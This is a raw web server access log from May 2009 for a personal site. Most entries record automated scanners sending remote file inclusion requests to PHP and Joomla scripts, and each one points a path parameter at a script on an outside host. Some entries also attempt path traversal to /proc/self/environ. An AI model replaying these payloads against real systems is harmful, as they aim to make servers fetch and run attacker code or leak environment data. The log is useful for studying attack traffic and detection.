91.121.210.42 - - [20/May/2009:09:44:21 -0700] "GET /logs/access_071223.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:44:22 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:44:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:44:49 -0700] "GET /logs/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:44:49 -0700] "GET /logs/access_080208.log/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:44:52 -0700] "GET /logs/access_081201.log%20%20//naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:44:57 -0700] "GET /logs/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:44:57 -0700] "GET /logs/access_080208.log/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:44:58 -0700] "GET /logs/access_081108.log%20%20//naboard_pnr.php?skin=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:44:58 -0700] "GET /index.php/?mosConfig_absolute_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 200 41954 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:45:01 -0700] "GET /index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 500 292 "-" "XXXXXX" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:45:06 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:45:09 -0700] "GET /logs/access_080208.log/index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:45:09 -0700] "GET /logs/index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:45:14 -0700] "GET /logs/access_071220.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:45:19 -0700] "GET /logs/access_071220.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.177.22.67 - - [20/May/2009:09:45:20 -0700] "GET /logs/access_080313.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:09:45:21 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:09:45:21 -0700] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:09:45:26 -0700] "GET /logs/access_080227.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:45:35 -0700] "GET /logs/access_080208.log%20%20/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:45:37 -0700] "GET /logs/access_080208.log%20%20/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:09:45:39 -0700] "GET /index.php/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 42040 "-" "XXXXXX" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:45:47 -0700] "GET /logs/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:09:45:47 -0700] "GET /logs/access_080321.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:45:49 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:45:49 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.229.68.219 - - [20/May/2009:09:45:50 -0700] "GET /logs/access_081116.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:45:51 -0700] "GET /logs/access_081105.log%20%20/export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:45:53 -0700] "GET /logs/access_080703.log%20%20/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:45:54 -0700] "GET /logs/access_080703.log%20%20/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:45:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:46:01 -0700] "GET /index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:09:46:04 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:09:46:05 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.111.189.11 - - [20/May/2009:09:46:16 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [20/May/2009:09:46:21 -0700] "GET /export.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:46:27 -0700] "GET /index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 41925 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:46:29 -0700] "GET /index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 200 41942 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:46:37 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:46:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:46:39 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [20/May/2009:09:46:57 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:47:01 -0700] "GET /logs/access_080213.log%20%20/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:47:08 -0700] "GET /logs/access_080208.log%20%20/index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:47:14 -0700] "GET /logs/access_080428.log%20%20/config.php?path_to_root=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:47:14 -0700] "GET /logs/access_080223.log%20%20/index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:09:47:22 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:09:47:22 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:09:47:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:47:29 -0700] "GET /logs/access_071223.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [20/May/2009:09:47:39 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:47:41 -0700] "GET /logs/access_071220.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:47:46 -0700] "GET /logs/access_090119.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:47:46 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:47:47 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:09:47:48 -0700] "GET /logs/access_081223.log/administrator/index.php?mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:47:55 -0700] "GET /logs/index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:47:55 -0700] "GET /logs/access_080521.log/index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:47:56 -0700] "GET /classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:47:56 -0700] "GET /logs//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:47:56 -0700] "GET /logs/access_090212.log//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:48:02 -0700] "GET /logs/access_071223.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:02 -0700] "GET /classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:02 -0700] "GET /logs/access_090212.log//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:02 -0700] "GET /logs//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:09:48:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:09:48:14 -0700] "GET /logs/access_071220.log%20%20/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:48:17 -0700] "GET /logs/access_090129.log/index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:17 -0700] "GET /classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:17 -0700] "GET /logs/access_090212.log//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:48:17 -0700] "GET /logs//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.129.119.47 - - [20/May/2009:09:48:20 -0700] "GET /logs/access_090129.log HTTP/1.0" 200 1572864 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
64.157.4.43 - - [20/May/2009:09:48:26 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:49:21 -0700] "GET /index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.1" 200 41926 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:50:28 -0700] "GET /logs/access_080521.log%20%20/index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:09:50:31 -0700] "GET /logs/access_080227.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:09:50:31 -0700] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.161.16 - - [20/May/2009:09:50:32 -0700] "GET /logs/access_090129.log%20%20/index.php?trans=http://indoirc.go.ro/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:50:47 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:50:47 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.193 - - [20/May/2009:09:50:47 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.57.13 - - [20/May/2009:09:51:06 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/teste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.57.13 - - [20/May/2009:09:51:07 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/teste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:09:51:19 -0700] "GET /logs/access_080321.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
199.203.85.10 - - [20/May/2009:09:51:31 -0700] "GET /favicon.ico HTTP/1.0" 404 275 "-" "-" "dmulk.com"
218.249.36.194 - - [20/May/2009:09:51:57 -0700] "GET /logs/access_090212.log%20%20//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:09:52:12 -0700] "GET /logs/access_080227.log%20%20///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:52:18 -0700] "GET /logs/access_080703.log/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.43.0.140 - - [20/May/2009:09:52:24 -0700] "GET /logs/access_080703.log/index.php?body=http://www.clancombatboots.net/files/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:09:52:26 -0700] "GET /logs/access_090212.log%20%20//classes.php?LOCAL_PATH=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.57.13 - - [20/May/2009:09:53:21 -0700] "GET /logs/access_081016.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dirk-gerber.de/phpkit/content/download/teste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.94.155.59 - - [20/May/2009:09:53:23 -0700] "GET /e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [20/May/2009:09:53:23 -0700] "GET /logs/access_080906.log/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [20/May/2009:09:53:23 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [20/May/2009:09:53:27 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:09:53:34 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.107.138.34 - - [20/May/2009:09:53:34 -0700] "GET /logs/access_081205.log//include/lib.inc.php?site_path=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:53:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:53:47 -0700] "GET /skin/zero_vote/error.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:53:47 -0700] "GET /logs/access_071214.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/gale232/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:22 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:22 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:22 -0700] "GET /logs/access_080524.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.98.68.154 - - [20/May/2009:09:54:27 -0700] "GET /xlmnhfaefaaaabmbl.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:35 -0700] "GET /logs/access_080615.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:39 -0700] "GET /skin/zero_vote/error.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:39 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:40 -0700] "GET /logs/access_071214.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:46 -0700] "GET /skin/zero_vote/error.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:46 -0700] "GET /logs/access_071214.log%20%20//skin/zero_vote/error.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [20/May/2009:09:54:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:47 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:48 -0700] "GET /logs/access_080524.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:48 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [20/May/2009:09:54:57 -0700] "GET /logs/access_080703.log/index.php?body=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:09:54:58 -0700] "GET /logs/access_080615.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
